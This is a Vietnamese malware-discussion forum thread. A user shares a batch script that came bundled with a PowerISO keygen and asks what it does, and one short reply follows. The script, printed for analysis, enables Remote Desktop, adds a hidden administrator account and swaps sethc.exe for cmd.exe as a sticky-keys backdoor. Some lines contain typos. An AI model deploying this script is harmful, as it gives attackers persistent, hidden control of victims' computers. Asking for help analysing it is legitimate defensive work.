Nhờ các bác phân tích giùm con này

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thảo luận virus, trojan, spyware, worm...

Nhờ các bác phân tích giùm con này

[Question] Nhờ các bác phân tích giùm con này	17/05/2013 01:17:18 (+0700) \| #1 \| 275773

nhok09cntt2
Member

Joined: 11/06/2011 01:38:30
Messages: 21
Offline

Hôm qua thằng bạn em nó gửi cho em phần mềm PowerISO qua mail
xong rồi 1 lúc sau thấy nó điều khiển được máy tính của em luôn
Hỏi nó thì nó quăng cho đoạn code này

@echo off
start PowerISO-Keygen.exe
if exist sethc.exe.suriv goto else goto hack
:hack
TAKEOWN /F C:\windows\Sytem32\sethc.exe
TAKEOWN /F C:\windows\Sytem32\cmd.exe
reg add "HKEY_LOCAL_MACHINE\sYSTEM\Currentcontrolset\Control\Terminal Sever" /v fDenyTSconnections /t REG_DWORD /d "0" /f
net user su forever /add
net localgroup administrators su /add
cd /d C:\Windows\System32
icacls sethc.exe /grant administrators:F
icacls cmd.exe /grant administrators:F
rename sethc.exe sethc.exe.suriv
icals sethc.exe.suriv /dent adminitrators:F
copy cmd.exe sethc.exe /y
reg add "HKEY_LOCAL_MACHINE\Software\Micosoft\WindowsNT\currentVerison\Winlogon\SpecialAccounts\userList" /v SU /t REG_DWORD /d "0" /f
:exit

Mình cứ thắc mắc k biết đây có phải là 1 con trojan thực sự không!
Nếu mà đây là trojan thì đoạn code trên như thế nào ạ

Ai hiểu được đoạn code này chỉ mình với!
Cảm ơn mọi người nhiều

[Question] Nhờ các bác phân tích giùm con này	26/05/2013 05:40:25 (+0700) \| #2 \| 275994

gaprogaycanh
Member

Joined: 30/06/2011 07:00:14
Messages: 12
Offline

theo mình nghĩ thì khi bạn run file keygen.exe của phần mềm để get key thì nó chạy 1 vài chương trình nhằm chiếm quyền thông qua cửa sổ cmd và thay đổi 1 vài thông số của hệ thống.

GaPro

Go to:

Users currently in here
1 Anonymous